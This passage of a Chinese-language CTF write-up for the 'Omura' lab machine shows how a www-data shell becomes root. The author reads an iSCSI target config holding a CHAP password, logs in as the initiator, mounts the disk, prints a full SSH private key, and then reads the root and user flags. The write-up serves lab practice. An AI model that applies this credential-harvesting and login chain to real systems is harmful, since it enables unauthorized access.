conn_timeout_errors\n-r--r--r-- 1 root root 4096 Apr 26 13:25 indx\n-r--r--r-- 1 root root 4096 Apr 26 13:25 inst\n-r--r--r-- 1 root root 4096 Apr 26 13:25 node\n-r--r--r-- 1 root root 4096 Apr 26 13:25 rsp_pdus\n-r--r--r-- 1 root root 4096 Apr 26 13:25 rxdata_octs\n-r--r--r-- 1 root root 4096 Apr 26 13:25 txdata_octs<\/code><\/pre>\n
\u8fd9\u5565\u554a\u8fd9\u90fd\u662f\u3002\u3002\u3002\u3002\u6309\u7167hacksticks<\/code>\u8bf4\u7684\u8bd5\u8bd5\u5427\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Omura]\n\u2514\u2500$ iscsiadm -m node --targetname="iqn.2023-02.omura.hmv:node01.initiator01" -p 192.168.0.145:3260\niscsiadm: No records found<\/code><\/pre>\n
\u914d\u7f6eiscsi<\/h3>\n
\u5bc4\uff0c\u770b\u5e08\u5085\u7684\u89e3\u7b54\u5427https:\/\/www.youtube.com\/watch?v=XNnLVU41WGM<\/p>\n
\u5148\u67e5\u770b\u8bf4\u660e\u6587\u4ef6\uff1a<\/p>\n
man targetcli<\/code><\/pre>\n
\"image-20240426193645461\"<\/div><\/p>\n
\u4e00\u70b9\u601d\u8def\u90fd\u6ca1\u6709\uff0c\u6587\u6863\u90fd\u627e\u4e0d\u5230\u3002\u3002\u3002\u3002<\/p>\n
(remote) www-data@omura.hmv:\/$ cat \/etc\/rtslib-fb-target\/saveconfig.json\n{\n  "fabric_modules": [],\n  "storage_objects": [\n    {\n      "aio": false,\n      "alua_tpgs": [\n        {\n          "alua_access_state": 0,\n          "alua_access_status": 0,\n          "alua_access_type": 3,\n          "alua_support_active_nonoptimized": 1,\n          "alua_support_active_optimized": 1,\n          "alua_support_offline": 1,\n          "alua_support_standby": 1,\n          "alua_support_transitioning": 1,\n          "alua_support_unavailable": 1,\n          "alua_write_metadata": 0,\n          "implicit_trans_secs": 0,\n          "name": "default_tg_pt_gp",\n          "nonop_delay_msecs": 100,\n          "preferred": 0,\n          "tg_pt_gp_id": 0,\n          "trans_delay_msecs": 0\n        }\n      ],\n      "attributes": {\n        "alua_support": 1,\n        "block_size": 512,\n        "emulate_3pc": 1,\n        "emulate_caw": 1,\n        "emulate_dpo": 1,\n        "emulate_fua_read": 1,\n        "emulate_fua_write": 1,\n        "emulate_model_alias": 1,\n        "emulate_pr": 1,\n        "emulate_rest_reord": 0,\n        "emulate_tas": 1,\n        "emulate_tpu": 0,\n        "emulate_tpws": 0,\n        "emulate_ua_intlck_ctrl": 0,\n        "emulate_write_cache": 1,\n        "enforce_pr_isids": 1,\n        "force_pr_aptpl": 0,\n        "is_nonrot": 0,\n        "max_unmap_block_desc_count": 1,\n        "max_unmap_lba_count": 8192,\n        "max_write_same_len": 4096,\n        "optimal_sectors": 16384,\n        "pgr_support": 1,\n        "pi_prot_format": 0,\n        "pi_prot_type": 0,\n        "pi_prot_verify": 0,\n        "queue_depth": 128,\n        "unmap_granularity": 1,\n        "unmap_granularity_alignment": 0,\n        "unmap_zeroes_data": 0\n      },\n      "dev": "\/var\/lib\/iscsi_disks\/disk01.img",\n      "name": "disk01",\n      "plugin": "fileio",\n      "size": 5242880,\n      "write_back": true,\n      "wwn": "cf4b7be7-963a-45f6-af05-dc1cda66f993"\n    }\n  ],\n  "targets": [\n    {\n      "fabric": "iscsi",\n      "tpgs": [\n        {\n          "attributes": {\n            "authentication": 0,\n            "cache_dynamic_acls": 0,\n            "default_cmdsn_depth": 64,\n            "default_erl": 0,\n            "demo_mode_discovery": 1,\n            "demo_mode_write_protect": 1,\n            "fabric_prot_type": 0,\n            "generate_node_acls": 0,\n            "login_keys_workaround": 1,\n            "login_timeout": 15,\n            "netif_timeout": 2,\n            "prod_mode_write_protect": 0,\n            "t10_pi": 0,\n            "tpg_enabled_sendtargets": 1\n          },\n          "enable": true,\n          "luns": [\n            {\n              "alias": "c8413cef8b",\n              "alua_tg_pt_gp_name": "default_tg_pt_gp",\n              "index": 0,\n              "storage_object": "\/backstores\/fileio\/disk01"\n            }\n          ],\n          "node_acls": [\n            {\n              "attributes": {\n                "dataout_timeout": 3,\n                "dataout_timeout_retries": 5,\n                "default_erl": 0,\n                "nopin_response_timeout": 30,\n                "nopin_timeout": 15,\n                "random_datain_pdu_offsets": 0,\n                "random_datain_seq_offsets": 0,\n                "random_r2t_offsets": 0\n              },\n              "chap_password": "gTQynqDRAyqvny7AbpeZ1Vi6e",\n              "chap_userid": "root",\n              "mapped_luns": [\n                {\n                  "alias": "a8a39c9925",\n                  "index": 0,\n                  "tpg_lun": 0,\n                  "write_protect": false\n                }\n              ],\n              "node_wwn": "iqn.2023-02.omura.hmv:node01.initiator01"\n            }\n          ],\n          "parameters": {\n            "AuthMethod": "CHAP,None",\n            "DataDigest": "CRC32C,None",\n            "DataPDUInOrder": "Yes",\n            "DataSequenceInOrder": "Yes",\n            "DefaultTime2Retain": "20",\n            "DefaultTime2Wait": "2",\n            "ErrorRecoveryLevel": "0",\n            "FirstBurstLength": "65536",\n            "HeaderDigest": "CRC32C,None",\n            "IFMarkInt": "Reject",\n            "IFMarker": "No",\n            "ImmediateData": "Yes",\n            "InitialR2T": "Yes",\n            "MaxBurstLength": "262144",\n            "MaxConnections": "1",\n            "MaxOutstandingR2T": "1",\n            "MaxRecvDataSegmentLength": "8192",\n            "MaxXmitDataSegmentLength": "262144",\n            "OFMarkInt": "Reject",\n            "OFMarker": "No",\n            "TargetAlias": "LIO Target"\n          },\n          "portals": [\n            {\n              "ip_address": "0.0.0.0",\n              "iser": false,\n              "offload": false,\n              "port": 3260\n            }\n          ],\n          "tag": 1\n        }\n      ],\n      "wwn": "iqn.2023-02.omura.hmv:target01"\n    }\n  ]\n}<\/code><\/pre>\n
\u5728\u672c\u673a\u4e0a\u8fdb\u884c\u64cd\u4f5c\uff0c\u5148\u4e0b\u8f7d\u4e00\u4e0b\uff1a<\/p>\n
sudo apt-get install open-iscsi<\/code><\/pre>\n
\u7136\u540e\u8fdb\u884c\u66ff\u6362\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# vim \/etc\/iscsi\/initiatorname.iscsi \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# cat \/etc\/iscsi\/initiatorname.iscsi \n## DO NOT EDIT OR REMOVE THIS FILE!\n## If you remove this file, the iSCSI daemon will not start.\n## If you change the InitiatorName, existing access control lists\n## may reject this initiator.  The InitiatorName must be unique\n## for each iSCSI initiator.  Do NOT duplicate iSCSI InitiatorNames.\nInitiatorName=iqn.2023-02.omura.hmv:node01.initiator01\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# vim \/etc\/iscsi\/iscsid.conf        \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# cat \/etc\/iscsi\/iscsid.conf   \n......................\nnode.session.auth.authmethod = CHAP                         # \u4fee\u65391\n\n# To configure which CHAP algorithms to enable, set\n# node.session.auth.chap_algs to a comma separated list.\n# The algorithms should be listed in order of decreasing\n# preference \u2014 in particular, with the most preferred algorithm first.\n# Valid values are MD5, SHA1, SHA256, and SHA3-256.\n# The default is MD5.\n#node.session.auth.chap_algs = SHA3-256,SHA256,SHA1,MD5\n\n# To set a CHAP username and password for initiator\n# authentication by the target(s), uncomment the following lines:\nnode.session.auth.username = root                           # \u4fee\u65392\nnode.session.auth.password = gTQynqDRAyqvny7AbpeZ1Vi6e      # \u4fee\u65393\n\n........................\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# systemctl restart iscsid open-iscsi.service \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# iscsiadm -m discovery -t sendtargets -p omura.hmv\n192.168.0.145:3260,1 iqn.2023-02.omura.hmv:target01\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# iscsiadm -m node --login                         \nLogging in to [iface: default, target: iqn.2023-02.omura.hmv:target01, portal: 192.168.0.145,3260]\niscsiadm: Could not login to [iface: default, target: iqn.2023-02.omura.hmv:target01, portal: 192.168.0.145,3260].\niscsiadm: initiator reported error (24 - iSCSI login failed due to authorization failure)\niscsiadm: Could not log into all portals<\/code><\/pre>\n
\u8fd9\u91cc\u51fa\u9519\u4e86\u3002\u3002\u3002\u3002\u4e0d\u77e5\u9053\u4ec0\u4e48\u9b3c\uff0c\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff0c\u91cd\u7f6emac\u5730\u5740\u8bd5\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# vim \/etc\/iscsi\/initiatorname.iscsi \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# cat \/etc\/iscsi\/initiatorname.iscsi\n## DO NOT EDIT OR REMOVE THIS FILE!\n## If you remove this file, the iSCSI daemon will not start.\n## If you change the InitiatorName, existing access control lists\n## may reject this initiator.  The InitiatorName must be unique\n## for each iSCSI initiator.  Do NOT duplicate iSCSI InitiatorNames.\nInitiatorName=iqn.2023-02.omura.hmv:node01.initiator01\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# vim \/etc\/iscsi\/iscsid.conf        \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# systemctl restart iscsid open-iscsi.service\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# iscsiadm -m discovery -t sendtargets -p omura.hmv\n192.168.0.181:3260,1 iqn.2023-02.omura.hmv:target01\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# iscsiadm -m node --login                         \nLogging in to [iface: default, target: iqn.2023-02.omura.hmv:target01, portal: 192.168.0.181,3260]\nLogin to [iface: default, target: iqn.2023-02.omura.hmv:target01, portal: 192.168.0.181,3260] successful.\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# lsblk\nNAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS\nsda      8:0    0 80.1G  0 disk \n\u2514\u2500sda1   8:1    0 80.1G  0 part \/\nsdb      8:16   0    5M  0 disk \nsr0     11:0    1 1024M  0 rom  \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# mkdir disk                   \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# mount \/dev\/sdb \/home\/kali\/temp\/Omura\/disk\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura]\n\u2514\u2500# cd disk                           \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura\/disk]\n\u2514\u2500# ls -la\ntotal 8\ndrwxr-xr-x 2 root root 1024 Feb 11  2023 .\ndrwxr-xr-x 3 kali kali 4096 Apr 26 08:32 ..\n-rw------- 1 root root 2602 Feb 11  2023 id_rsa\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Omura\/disk]\n\u2514\u2500# cat id_rsa                        \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEApZKYHw\/UHV2iiryEKSdWRI6jhyQdNE1W8a3kmSje\/wkRs2MRG3CB\nSoHu2TEdKYNU8zqxortL+aV9UtAvLKNC2EpxI1vKeNrgXu1ULjMYPuwzzy1O+jtrZtdV09\n9d6JFj1a9QWdYJ+PqxEdU2EZvjqfn8lTf\/rYpuglT9QAeouSPF753P4pHz3IQiBk7Sngog\nQQrhv4VNfH273DfrOy38e7v65T2wuvFCvqscOXbnzKghCcuPY8vNEDgpw6anjHT4VoDfgu\nXZhne1ntsBaBG6YcIgGTIbQNeuDqLterPTQy22F6T4Fk2k9DL6qM9twGdJK3bjphWF\/\/wd\noFd+iIxZlUcptgGhMUGbPLrfzKmQhnodI4SIDHeV6O17SzkVBRmK1PLpPpM7LFuuRjJCsS\n60U\/igdVGb9AMAcBE8xNJt1sxjc8X+QOeRNh1Vb2LkfxkIFbT8iFDd8EVCYsIdP+sNFoCy\n+VXICi5\/+JpV9k6vSUg3se\/6B2oorZpDhSWWiehzAAAFiJXNfbmVzX25AAAAB3NzaC1yc2\nEAAAGBAKWSmB8P1B1dooq8hCknVkSOo4ckHTRNVvGt5Jko3v8JEbNjERtwgUqB7tkxHSmD\nVPM6saK7S\/mlfVLQLyyjQthKcSNbynja4F7tVC4zGD7sM88tTvo7a2bXVdPfXeiRY9WvUF\nnWCfj6sRHVNhGb46n5\/JU3\/62KboJU\/UAHqLkjxe+dz+KR89yEIgZO0p4KIEEK4b+FTXx9\nu9w36zst\/Hu7+uU9sLrxQr6rHDl258yoIQnLj2PLzRA4KcOmp4x0+FaA34Ll2YZ3tZ7bAW\ngRumHCIBkyG0DXrg6i7Xqz00Mtthek+BZNpPQy+qjPbcBnSSt246YVhf\/8HaBXfoiMWZVH\nKbYBoTFBmzy638ypkIZ6HSOEiAx3lejte0s5FQUZitTy6T6TOyxbrkYyQrEutFP4oHVRm\/\nQDAHARPMTSbdbMY3PF\/kDnkTYdVW9i5H8ZCBW0\/IhQ3fBFQmLCHT\/rDRaAsvlVyAouf\/ia\nVfZOr0lIN7Hv+gdqKK2aQ4UllonocwAAAAMBAAEAAAGAFAGtrfssp0u8K0VyNsLREsGlkt\nvTR5Gc0uEvQS6GG40N\/X4YABfNF6KxqL7dhjmfVzCdbEtzd7v+c7ZCLQOhPR9polsiEQ5p\nlC7bQCXeZSQHcp5H78akSK32af6Qi1yeEqD3dZN+av5nzP7VZLVQgiZ51dIJa\/\/RMKByZX\n1Hbu+aqESKbRczv06cCeUWYBBbK2DUPF8wKL3MqGR9YQ5CdvUU8QROSZiDdySX6X2rrrgW\nHefh8K4cnjwbF9AYaMltUsTu1Oyg\/A7HdoXa3O2rA+Z9\/\/uvkPTUZC7hanYopfqRDroRvx\nCSJbODab1g+SXZZI18iUqocfkVGKK05oudK7kPJ2\/eLLqRznGkRH+JDUQAY3ChGfGVbrKV\nq8dNfeu0slzsOzOTrEOzno2UqHhYFFdEas3rY6enXhGvx6Zxm2adqlbhmp7VpZqYLB6te4\nt3\/v\/cdvxH+EmxPY4nduioYREuQFPtU7Eo+\/KuAA+ZG+kKdvpzuR4FrOlIk6OyohiZAAAA\nwQDClUpX8efbM3k\/vhqCh5WLXOY0ABuckvtYA0vsTKBNtKwN2Jvx7Ud2mkGbeWCkczfxfj\nx+6YT9gkP8qAhJ3rK8iDwnU0qiOe1Wm3uerB4x+QTXyFSBSQTGcTZ6XdcbnhUKrEGrBHLx\nNnGor8Rfluil6iWHiH+v5aaCRDIIKh7mRerscjAy+81xvgmH9i4Z6NEtZuT72cMREQsWAH\n9R1M094ubkQgtvv66rOLDNklHC2TapFN\/m\/Q90IuOJmBXx0FYAAADBANV8ymm2BTHiSOLt\n2XJQQjPsmz0BiKhrUZbDGhq0XaeMclRazFlAy6V3v6ikZk9t2\/dQiFtCznjSalHQZcO9mm\nrVtYs8EETpEgoYTgKuGWn9lE0GguV18y7UKVzS6SK\/uiBXvKEJTI9XivSN5ZNtNSyM9Ze7\nPvLDuACRWrhZeZV18FblL8GhuhBXQgEoVwtbbAjVFHr+aJ8NAPIgQoKB1Urom+c5EV18Xz\nLqwlP3C1kT2AF\/wubj+bO6kfJcGneP\/wAAAMEAxosw79NHfYzPEGMrr0PY6pOr5WnGM4yc\n1N8HzICJ7\/cHI8AV6cfrkE1YovmkZ90faUR7mC0Ui6vx5su11swa5lq7Ta89kGpMdE9Fda\n3UYctkW76wiIQIKTUTyVIOGn869pDwjBaXoCwQ4lUnrXNgSqVpbspvtC1wA1zo5Ccwpc3E\ng7GUCHzzKUHdSqQlevODmIA8I+1XAhfpRn87M9q1uBUnegGiau0ixeQDZec7mgPe5YXBRo\nyfkwJ2SZ8YQGeNAAAAC3Jvb3RAZGViaWFuAQIDBAUGBw==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u6210\u529f\uff01\u4f7f\u7528\u8be5\u79c1\u94a5\u8fdb\u884c\u767b\u5f55\u5373\u53ef\uff01<\/p>\n
(remote) www-data@omura.hmv:\/$ cd \/tmp      \n(remote) www-data@omura.hmv:\/tmp$ ss -atlp \nState            Recv-Q           Send-Q                     Local Address:Port                             Peer Address:Port          Process          \nLISTEN           0                80                             127.0.0.1:mysql                                 0.0.0.0:*                              \nLISTEN           0                128                              0.0.0.0:ssh                                   0.0.0.0:*                              \nLISTEN           0                256                              0.0.0.0:iscsi-target                          0.0.0.0:*                              \nLISTEN           0                511                                    *:http                                        *:*                              \nLISTEN           0                128                                 [::]:ssh                                      [::]:*                              \n(remote) www-data@omura.hmv:\/tmp$ vi root\n(remote) www-data@omura.hmv:\/tmp$ chmod 600 root\n(remote) www-data@omura.hmv:\/tmp$ ssh root@0.0.0.0 -i root\nThe authenticity of host '0.0.0.0 (0.0.0.0)' can't be established.\nECDSA key fingerprint is SHA256:+ckLANZQ\/YnjlcBKT4ZXwxBF3IjkBDvZ9IaPV+AOa7U.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nCould not create directory '\/var\/www\/.ssh' (Permission denied).\nFailed to add the host to the list of known hosts (\/var\/www\/.ssh\/known_hosts).\nLinux omura.hmv 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nroot@omura:~# ls -la\ntotal 32\ndrwx------  5 root root 4096 14 f\u00e9vr.  2023 .\ndrwxr-xr-x 18 root root 4096 13 f\u00e9vr.  2023 ..\nlrwxrwxrwx  1 root root    9  6 f\u00e9vr.  2023 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root  571 14 f\u00e9vr.  2023 .bashrc\ndrwxr-xr-x  3 root root 4096 14 f\u00e9vr.  2023 .cache\ndrwxr-xr-x  3 root root 4096 14 f\u00e9vr.  2023 .local\n-rw-r--r--  1 root root  161 14 f\u00e9vr.  2023 .profile\n-rwx------  1 root root   33 14 f\u00e9vr.  2023 root.txt\ndrwx------  2 root root 4096 14 f\u00e9vr.  2023 .ssh\nroot@omura:~# cat root.txt \n052cf26a6e7e33790391c0d869e2e40c\nroot@omura:~# cd \/home\nroot@omura:\/home# ls\nford\nroot@omura:\/home# cd ford\/\nroot@omura:\/home\/ford# ls -la\ntotal 24\ndrwxr-xr-x 2 ford ford 4096 14 f\u00e9vr.  2023 .\ndrwxr-xr-x 3 root root 4096 13 f\u00e9vr.  2023 ..\nlrwxrwxrwx 1 root root    9 13 f\u00e9vr.  2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 ford ford  220 14 f\u00e9vr.  2023 .bash_logout\n-rw-r--r-- 1 ford ford 3526 14 f\u00e9vr.  2023 .bashrc\n-rw-r--r-- 1 ford ford  807 14 f\u00e9vr.  2023 .profile\n-rwx------ 1 ford ford   33 14 f\u00e9vr.  2023 user.txt\nroot@omura:\/home\/ford# cat user.txt \ncf7ddf6fa6393b8e7aef2396451fefdd<\/code><\/pre>\n
\u62ff\u5230rootshell\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Omura \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp] \u2514\u2500$ sudo nmap – […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-636","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/636","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=636"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/636\/revisions"}],"predecessor-version":[{"id":638,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/636\/revisions\/638"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=636"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=636"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=636"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}